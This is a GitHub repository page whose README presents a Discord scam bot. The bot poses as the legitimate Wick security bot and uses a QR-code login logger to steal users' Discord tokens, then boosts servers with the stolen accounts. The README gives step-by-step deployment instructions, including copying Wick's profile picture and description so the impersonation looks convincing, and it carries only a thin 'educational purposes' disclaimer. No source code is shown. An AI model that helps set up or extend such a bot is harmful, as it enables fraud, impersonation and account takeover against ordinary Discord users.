Skip to content
/ scam Public

Wick Discord scam bot that uses a QR Code logger to grab Discord tokens. DOESN'T USE CHROME WEB DRIVER

Notifications You must be signed in to change notification settings

Mago126/scam

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

54 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Wick Scam Bot ⛔

Wick Discord scam bot that grabs tokens via a QR Code.
Make sure to star this project ⭐!

This project is for Educational Purposes ONLY. This was not meant for malicous use.
When using this Discord Bot, you hold responsibility for any consequences that you occur.

Features

  • Exact Clone (Looks exactly like the real wick bot when set up properly)
  • Modular Design (add commands and events exactly like a real bot. also has a customisable config file)
  • Automatic Boosting (fetches and boosts server instantly when logged. if option selected)

image

Setup

  • Clone Repository gh repo clone ulnk/scam
  • Install Dependencies yarn or npm install
  • Create Bot go to bot dashboard
    • ENABLE ALL PARTIALS AND INTENTS FOR YOUR BOT
    • Without all partials and intents, the bot will not function.
    • Change profile picture to wick.png
    • Change description to
Discord Security Bot made to protect servers from raids, nukes and more things!
https://wickbot.com/
  • Edit config.json file
    • Change the all of the config.json options to your bot .
    • (NOTE: KEEP ALL CHANNELS INSIDE THE SAME GUILD)
  • Add all emojis to server
    • Without, the emojis will be undefined
    • You can select all and drag into the add emojis discord page
    • (NOTE: YOU HAVE TO ADD ALL EMOJI IDS INTO CONFIG.JSON)
  • Start yarn dev or npm run dev
    • if using heroku, make sure you have the start script
Video Explanation

video

Libraries Used

  • discord.js (discord bot) preview badge
  • crypto (private keys & public keys) preview badge
  • ws (web socket) preview badge
  • jimp (image editing for qr code) preview badge

About

Wick Discord scam bot that uses a QR Code logger to grab Discord tokens. DOESN'T USE CHROME WEB DRIVER

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published